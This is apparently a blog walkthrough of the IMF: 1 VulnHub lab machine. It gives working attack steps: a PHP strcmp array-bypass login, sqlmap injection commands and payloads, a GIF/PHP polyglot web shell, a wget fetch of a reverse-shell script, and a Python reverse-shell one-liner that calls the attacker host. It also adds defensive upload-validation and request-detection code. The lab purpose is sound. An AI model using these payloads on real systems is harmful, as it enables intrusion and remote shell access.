vulhub series 47: IMF: 1 (detailed walkthrough)

张开发
2026/5/22 16:45:55 · 15 min read

Disclaimer: this post records the solution of the IMF: 1 penetration-testing target machine. All operations were performed in a local, authorised environment. The content is for cyber-security learning and defensive research only; do not use it for any illegal purpose. Readers should comply with the Cybersecurity Law and related laws and regulations and help keep cyberspace secure.

Welcome to "IMF", my first Boot2Root virtual machine. IMF is an intelligence agency that you must hack into to obtain all the flags and ultimately confirm the identity. The flags start out easy but get progressively harder. Each flag contains a hint pointing to the next flag. I hope you enjoy this virtual platform and learn something along the way.

Environment: https://download.vulnhub.com/imf/IMF.ova

I. Information gathering

1. Discover the target IP address

arp-scan -l   # discover every IP address on the current subnet

```
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1     0a:00:27:00:00:04       (Unknown: locally administered)
192.168.5.2     08:00:27:4b:b8:1e       PCS Systemtechnik GmbH
192.168.5.14    08:00:27:09:9f:0e       PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 3 responded
```

nmap -sP 192.168.5.0/24

```
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-22 01:07 -0500
Nmap scan report for 192.168.5.1
Host is up (0.00014s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00018s latency).
MAC Address: 08:00:27:4B:B8:1E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.14
Host is up (0.00018s latency).
MAC Address: 08:00:27:09:9F:0E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.11
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.00 seconds
```

Target IP: 192.168.5.14

2. Scan the target's open ports

nmap -sV -p- 192.168.5.14

```
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-22 01:07 -0500
Nmap scan report for 192.168.5.14
Host is up (0.00017s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:09:9F:0E (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.91 seconds
```

Open port: 80

3. Directory enumeration

dirsearch -u http://192.168.5.14

```
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.14
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.5.14/_26-02-22_01-11-30.txt

Target: http://192.168.5.14/

[01:11:30] Starting:
[01:11:31] 301 -  309B  - /js  ->  http://192.168.5.14/js/
[01:11:31] 403 -  298B  - /.ht_wsr.txt
[01:11:31] 403 -  301B  - /.htaccess.orig
[01:11:31] 403 -  301B  - /.htaccess.bak1
[01:11:31] 403 -  303B  - /.htaccess.sample
[01:11:31] 403 -  301B  - /.htaccess.save
[01:11:31] 403 -  299B  - /.htaccess_sc
[01:11:31] 403 -  299B  - /.htaccessBAK
[01:11:31] 403 -  301B  - /.htaccess_orig
[01:11:31] 403 -  299B  - /.htaccessOLD
[01:11:31] 403 -  302B  - /.htaccess_extra
[01:11:31] 403 -  300B  - /.htaccessOLD2
[01:11:31] 403 -  291B  - /.htm
[01:11:31] 403 -  292B  - /.html
[01:11:31] 403 -  298B  - /.httr-oauth
[01:11:31] 403 -  301B  - /.htpasswd_test
[01:11:31] 403 -  297B  - /.htpasswds
[01:11:32] 403 -  292B  - /.php3
[01:11:32] 403 -  291B  - /.php
[01:11:44] 200 -    2KB - /contact.php
[01:11:45] 301 -  310B  - /css  ->  http://192.168.5.14/css/
[01:11:48] 301 -  312B  - /fonts  ->  http://192.168.5.14/fonts/
[01:11:50] 301 -  313B  - /images  ->  http://192.168.5.14/images/
[01:11:50] 403 -  294B  - /images/
[01:11:51] 403 -  290B  - /js/
[01:11:59] 200 -    2KB - /projects.php
[01:12:01] 403 -  301B  - /server-status/
[01:12:01] 403 -  300B  - /server-status

Task Completed
```

II. Exploitation

1. Visit the home page

Click the third menu option and view the page source: it contains flag1{YWxsdGhlZmlsZXM}. Base64-decoding the content of the flag gives the string allthefiles.

Click the first option on the home page and view its source. Three fragments there look like base64; joined together they read ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ. Base64-decoding that gives flag2{aW1mYWRtaW5pc3RyYXRvcg}, and decoding the content of flag2 gives the string imfadministrator.

Visiting the imfadministrator path shows a login page. The page source contains this hint: "I can't use SQL, so I hard-coded the password. It's still very secure."

Entering an arbitrary username and password and clicking Login, the page responds "Invalid username", so the next step is to find the correct username. Browsing the site reveals three email addresses; try the three local parts as usernames:

```
rmichaels@imf.local
akeith@imf.local
estone@imf.local
```

Logging in with the first username, rmichaels, the response changes to "Invalid password", which tells us the username is correct. We still have no password, and a blind brute-force attempt has a very low chance of success.

2. Exploitation

Intercept the login request with Yakit and bypass the check. This is the PHP strcmp() comparison bypass: comparing a string with an array.

```php
<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
    // strcmp() returns < 0 if str1 is less than str2, > 0 if str1 is greater than str2,
    // and 0 if the two are equal. The comparison is case-sensitive.
    if (strcmp($_GET['a'], $flag) == 0)
        die("Flag: " . $flag);
    else
        print "No";
}
?>
```

If a is sent as non-string data, strcmp() raises a warning and the comparison behaves as if it returned 0: in PHP 7 and earlier strcmp() returns NULL for an array argument, and NULL == 0 is true under loose comparison. So we send pass as an array to trigger that path:

```
user=rmichaels&pass[]=111111
```

This yields flag3{Y29udGludWVUT2Ntcw}; base64-decoding gives continueTOcms.

Turn off interception and the page redirects to the next screen. Click IMF CMS to enter a new page. Adding a single quote to the URL in the address bar produces an error message in the response, which indicates a SQL injection vulnerability:

```
http://192.168.5.14/imfadministrator/cms.php?pagename=home
```

Because this injection point sits behind the login, sqlmap has to be given the session cookie.

3. SQLmap

a. Databases: enumerate all databases

```
sqlmap -o -u "http://192.168.5.14/imfadministrator/cms.php?pagename=home" --cookie="PHPSESSID=sioa5jkoam217baql59f577fg3" --batch --dbs
```

```
┌──(root㉿kali)-[~]
└─# sqlmap -o -u "http://192.168.5.14/imfadministrator/cms.php?pagename=home" --cookie="PHPSESSID=sioa5jkoam217baql59f577fg3" --batch --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:30:03 /2026-02-22/

[02:30:03] [INFO] testing connection to the target URL
[02:30:03] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:30:03] [INFO] testing NULL connection to the target URL
[02:30:03] [INFO] NULL connection is supported with GET method ('Range')
[02:30:03] [INFO] testing if the target URL content is stable
[02:30:04] [INFO] target URL content is stable
[02:30:04] [INFO] testing if GET parameter 'pagename' is dynamic
[02:30:04] [INFO] GET parameter 'pagename' appears to be dynamic
[02:30:04] [INFO] heuristic (basic) test shows that GET parameter 'pagename' might be injectable (possible DBMS: 'MySQL')
[02:30:04] [INFO] testing for SQL injection on GET parameter 'pagename'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[02:30:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:30:04] [INFO] GET parameter 'pagename' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[02:30:04] [INFO] testing 'Generic inline queries'
[02:30:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:30:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:30:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:30:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:30:04] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[02:30:04] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[02:30:04] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:30:04] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:30:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:30:04] [INFO] GET parameter 'pagename' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[02:30:04] [INFO] testing 'MySQL inline queries'
[02:30:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:30:04] [WARNING] time-based comparison requires larger statistical model, please wait................. (done)
[02:30:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:30:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:30:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[02:30:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:30:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[02:30:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:30:14] [INFO] GET parameter 'pagename' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[02:30:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:30:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:30:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[02:30:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:30:14] [INFO] target URL appears to have 1 column in query
[02:30:14] [INFO] GET parameter 'pagename' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'pagename' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: pagename (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pagename=home' AND 1839=1839 AND 'NRKE'='NRKE

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: pagename=home' AND (SELECT 3238 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SELECT (ELT(3238=3238,1))),0x7170627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'RziM'='RziM

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: pagename=home' AND (SELECT 9500 FROM (SELECT(SLEEP(5)))dmpx) AND 'hajy'='hajy

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: pagename=-1830' UNION ALL SELECT CONCAT(0x7162707171,0x6b6247757863596967454e4a694b476a4147735654546f41616c624e4678444a586e43716d674b76,0x7170627071)#
---
[02:30:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[02:30:14] [INFO] fetching database names
[02:30:14] [INFO] starting 3 threads
[02:30:14] [INFO] retrieved: 'admin'
[02:30:14] [INFO] retrieved: 'mysql'
[02:30:14] [INFO] retrieved: 'information_schema'
[02:30:14] [INFO] retrieved: 'performance_schema'
[02:30:14] [INFO] retrieved: 'sys'
available databases [5]:
[*] admin
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

[02:30:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14'

[*] ending @ 02:30:14 /2026-02-22/
```

Result:

```
available databases [5]:
[*] admin
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
```

b. Tables: list the tables of the admin database. It contains a single table, pages.

```
sqlmap -o -u "http://192.168.5.14/imfadministrator/cms.php?pagename=home" --cookie="PHPSESSID=sioa5jkoam217baql59f577fg3" --batch -D admin --tables
```

```
┌──(root㉿kali)-[~]
└─# sqlmap -o -u "http://192.168.5.14/imfadministrator/cms.php?pagename=home" --cookie="PHPSESSID=sioa5jkoam217baql59f577fg3" --batch -D admin --tables

[*] starting @ 02:31:07 /2026-02-22/

[02:31:08] [INFO] resuming back-end DBMS 'mysql'
[02:31:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[02:31:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[02:31:08] [INFO] fetching tables for database: 'admin'
Database: admin
[1 table]
+-------+
| pages |
+-------+

[02:31:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14'

[*] ending @ 02:31:08 /2026-02-22/
```

Result:

```
Database: admin
[1 table]
+-------+
| pages |
+-------+
```

c. Columns: dump the full contents of the pages table.

```
sqlmap -o -u "http://192.168.5.14/imfadministrator/cms.php?pagename=home" --cookie="PHPSESSID=sioa5jkoam217baql59f577fg3" --batch -D admin -T pages --dump
```

```
┌──(root㉿kali)-[~]
└─# sqlmap -o -u "http://192.168.5.14/imfadministrator/cms.php?pagename=home" --cookie="PHPSESSID=sioa5jkoam217baql59f577fg3" --batch -D admin -T pages --dump

[*] starting @ 02:32:18 /2026-02-22/

[02:32:18] [INFO] resuming back-end DBMS 'mysql'
[02:32:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[02:32:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[02:32:18] [INFO] fetching columns for table 'pages' in database 'admin'
[02:32:18] [INFO] starting 3 threads
[02:32:18] [INFO] retrieved: id,int(11)
[02:32:18] [INFO] retrieved: pagename,varchar(255)
[02:32:18] [INFO] retrieved: pagedata,text
[02:32:18] [INFO] fetching entries for table 'pages' in database 'admin'
[02:32:18] [INFO] starting 3 threads
[02:32:18] [INFO] retrieved: 2,Welcome to the IMF Administration.,h...
[02:32:18] [INFO] retrieved: 3,Training classrooms available. <br /...
[02:32:18] [INFO] retrieved: 1,Under Construction.,upload
[02:32:18] [INFO] retrieved: 4,<h1>Disavowed List</h1><img src=./ima...
Database: admin
Table: pages
[4 entries]
+----+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| id | pagedata                                                                                                                                                                | pagename             |
+----+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| 1  | Under Construction.                                                                                                                                                     | upload               |
| 2  | Welcome to the IMF Administration.                                                                                                                                      | home                 |
| 3  | Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us for training.                                                                | tutorials-incomplete |
| 4  | <h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>****** ******</li><li>*******</li><li>**** ********</li></ul><br />-Secretary | disavowlist          |
+----+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+

[02:32:18] [INFO] table 'admin.pages' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.5.14/dump/admin/pages.csv'
[02:32:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14'

[*] ending @ 02:32:18 /2026-02-22/
```

Visit the two image paths from the dump; one of them is a QR code:

```
http://192.168.5.14/imfadministrator/images/whiteboard.jpg
http://192.168.5.14/imfadministrator/images/redacted.jpg
```

Scanning the first QR code with a phone gives flag4{dXBsb2Fkcjk0Mi5waHA}; base64-decoding gives uploadr942.php. Visiting that PHP page shows a file-upload form. Create a.gif with the following content:

```
GIF89a
<?php $a=$_GET['a']; print($a); ?>
```

Upload a.gif. After the upload succeeds, view the page source: the uploaded file has been renamed.

```
http://192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?a=ls
```

Read flag5:

```
192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?a=cat flag5_abc123def.txt
```

This gives flag5{YWdlbnRzZXJ2aWNlcw}, which decodes to agentservices.

4. Reverse shell

```
cp /usr/share/webshells/php/php-reverse-shell.php .
vim php-reverse-shell.php
```

Change the following two parameters:

```php
$ip = '192.168.5.11';  // Kali's IP
$port = 1234;          // nc listening port
```

```
mv php-reverse-shell.php reverse.php
python -m http.server 80
```

In the browser:

```
192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?a=ls
192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?a=wget http://192.168.5.11/reverse.php
192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?a=ls
```

Once the file is in place, start the listener on Kali and open the following URL in the browser: 192.168.5.14/imfadministrator/uploads/reverse.php

Kali: nc -lvnp 1234. Success:

```
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
```
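The a.gif trick above works because the upload check was satisfied by the GIF89a magic bytes alone; the real fix is to never let the web server execute anything in the upload directory, with content validation as a second layer. As an added example that is not part of this write-up, the Python below walks the actual GIF block structure and rejects such GIF89a/PHP polyglots. MINIMAL_GIF and POLYGLOT are constructed samples.

```python
# Added example, not from the original write-up: reject GIF89a/PHP polyglots by
# walking the real GIF block structure instead of trusting the magic bytes.
import struct

def _color_table_len(packed):
    """Byte length of a colour table announced by a packed-flags byte (bit 7)."""
    if not packed & 0x80:
        return 0
    return 3 * (2 ** ((packed & 0x07) + 1))

def _skip_sub_blocks(data, pos):
    """Advance past length-prefixed sub-blocks until the 0x00 terminator."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size

def is_structurally_valid_gif(data):
    """True only for a complete GIF87a/GIF89a stream with nothing after the trailer."""
    try:
        if data[:6] not in (b"GIF87a", b"GIF89a"):
            return False
        # Logical screen descriptor: width, height, packed flags, bg index, aspect
        _w, _h, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, 6)
        pos = 13 + _color_table_len(packed)
        while True:
            if pos >= len(data):
                return False            # ran out of bytes before the trailer
            introducer = data[pos]
            pos += 1
            if introducer == 0x3B:      # trailer: must be the final byte
                return pos == len(data)
            if introducer == 0x21:      # extension: label byte, then sub-blocks
                pos = _skip_sub_blocks(data, pos + 1)
            elif introducer == 0x2C:    # image descriptor (+ optional local table)
                ipacked = struct.unpack_from("<HHHHB", data, pos)[4]
                pos += 9 + _color_table_len(ipacked) + 1   # +1: LZW min code size
                pos = _skip_sub_blocks(data, pos)
            else:
                return False            # not a GIF block: PHP text lands here
    except (struct.error, ValueError, IndexError):
        return False

# Constructed samples: a minimal valid 1x1 GIF and a polyglot like the a.gif above.
MINIMAL_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00"        # header + logical screen descriptor
    b"\x00\x00\x00\xff\xff\xff"                  # 2-entry global colour table
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor
    b"\x02\x02\x44\x01\x00"                      # LZW min code size + one sub-block
    b"\x3b"                                      # trailer
)
POLYGLOT = b"GIF89a\n<?php $a=$_GET['a']; print($a); ?>\n"

if __name__ == "__main__":
    print(is_structurally_valid_gif(MINIMAL_GIF))  # True
    print(is_structurally_valid_gif(POLYGLOT))     # False
```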
III. Privilege escalation

1. Switch to bash

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

```
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.5.11] from (UNKNOWN) [192.168.5.14] 33230
Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 03:00:43 up  1:07,  0 users,  load average: 0.06, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@imf:/$
```

2. Find the agent service

The hint (agentservices) says to look for it:

```
www-data@imf:/$ whereis agent
whereis agent
agent: /usr/local/bin/agent
www-data@imf:/$
```

The shell reports agent: /usr/local/bin/agent. Entering /usr/local/bin/ there is another file called access_codes; it contains SYN 7482,8279,9467.

```
www-data@imf:/$ cd /usr/local/bin/
cd /usr/local/bin/
www-data@imf:/usr/local/bin$ ls
ls
access_codes  agent
www-data@imf:/usr/local/bin$ cat access_codes
cat access_codes
SYN 7482,8279,9467
www-data@imf:/usr/local/bin$
```

3. Port knocking

```
knock 192.168.5.14 7482 8279 9467 -v
nmap -p7788 192.168.5.14
```

```
┌──(root㉿kali)-[~]
└─# knock 192.168.5.14 7482 8279 9467 -v
hitting tcp 192.168.5.14:7482
hitting tcp 192.168.5.14:8279
hitting tcp 192.168.5.14:9467

┌──(root㉿kali)-[~]
└─# nmap -p7788 192.168.5.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-22 03:05 -0500
Nmap scan report for 192.168.5.14
Host is up (0.00027s latency).

PORT     STATE SERVICE
7788/tcp open  unknown
MAC Address: 08:00:27:09:9F:0E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds
```

Port 7788 has been knocked open. Connect to it from Kali with nc:

```
nc 192.168.5.14 7788
```

```
┌──(root㉿kali)-[~]
└─# nc 192.168.5.14 7788
 ___ __  __ ___
|_ _|  \/  | __|   Agent
 | || |\/| | _|    Reporting
|___|_|  |_|_|     System

Agent ID :
```

Check in the shell whether Python is installed (python3 is present) and whether Perl is, then use python3 to spawn another reverse shell:

```
which python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.5.11",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

```
www-data@imf:/usr/local/bin$ which python3
which python3
/usr/bin/python3
www-data@imf:/usr/local/bin$
www-data@imf:/usr/local/bin$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.5.11",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

Flags so far:

```
flag1{YWxsdGhlZmlsZXM}
flag2{aW1mYWRtaW5pc3RyYXRvcg}
flag3{Y29udGludWVUT2Ntcw}
flag4{dXBsb2Fkcjk0Mi5waHA}
```

The techniques in this post apply only to authorised test environments or legitimate CTF events. Do not test any system without authorisation. The road of security starts with compliance and ends with responsibility.
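As an added example that is not part of this write-up, here is the defender's counterpart to the web stage of the chain above: a request classifier in Python that flags the three techniques used (an array-typed pass[] field against the login form, sqlmap-style payloads in pagename, and parameters or PHP files under the upload directory). The sample requests and the LOGIN_PATH / UPLOAD_DIR constants are constructed assumptions about the IMF layout.

```python
# Added example, not from the original write-up: flag the web-stage techniques
# used against IMF (array-typed login field, SQL injection probes, parameters
# or PHP files under the upload directory). Paths are assumptions about the
# IMF layout seen in the walkthrough; the sample requests are constructed.
import re
from urllib.parse import parse_qs, urlsplit

LOGIN_PATH = "/imfadministrator/"           # assumed: the hard-coded login form
UPLOAD_DIR = "/imfadministrator/uploads/"   # assumed: where uploads are stored
IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png")
SQLI_PATTERNS = [
    re.compile(r"\bunion\b.+\bselect\b", re.I),          # UNION query
    re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),        # time-based blind
    re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),       # FLOOR error-based
    re.compile(r"\band\b\s*\d+\s*=\s*\d+", re.I),        # boolean-based blind
]

def classify(method, url, body=""):
    """Return the findings for one request; an empty list means nothing suspicious."""
    findings = []
    parts = urlsplit(url)
    path = parts.path
    query = parse_qs(parts.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True) if method == "POST" else {}
    # 1. strcmp() bypass: a scalar credential field submitted as an array (pass[]=)
    if path == LOGIN_PATH:
        for key in form:
            if key.endswith("[]") and key[:-2] in ("user", "pass"):
                findings.append("array-typed credential field %r" % key)
    # 2. SQL injection probes in any query-string parameter
    for key, values in query.items():
        if any(p.search(v) for v in values for p in SQLI_PATTERNS):
            findings.append("sql injection pattern in %r" % key)
    # 3. upload directory abuse: images never take parameters, and nothing
    #    stored there should be served as PHP at all
    if path.startswith(UPLOAD_DIR):
        if path.lower().endswith(IMAGE_EXT) and query:
            findings.append("parameters passed to an uploaded image")
        if path.lower().endswith(".php"):
            findings.append("php file requested from upload directory")
    return findings

# Constructed requests mirroring the steps in the write-up (not real log data).
SAMPLE_REQUESTS = [
    ("GET", "/projects.php", ""),
    ("POST", "/imfadministrator/", "user=rmichaels&pass[]=111111"),
    ("GET", "/imfadministrator/cms.php?pagename=home'%20AND%201839=1839%20AND%20'NRKE'='NRKE", ""),
    ("GET", "/imfadministrator/cms.php?pagename=-1830'%20UNION%20ALL%20SELECT%20NULL%23", ""),
    ("GET", "/imfadministrator/uploads/041e919fa8cf.gif?a=ls", ""),
    ("GET", "/imfadministrator/uploads/reverse.php", ""),
]

def scan(requests):
    """Map each request URL to its findings, keeping only flagged requests."""
    return {url: classify(m, url, b) for m, url, b in requests if classify(m, url, b)}

if __name__ == "__main__":
    for url, hits in scan(SAMPLE_REQUESTS).items():
        print(url, "->", ", ".join(hits))
```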
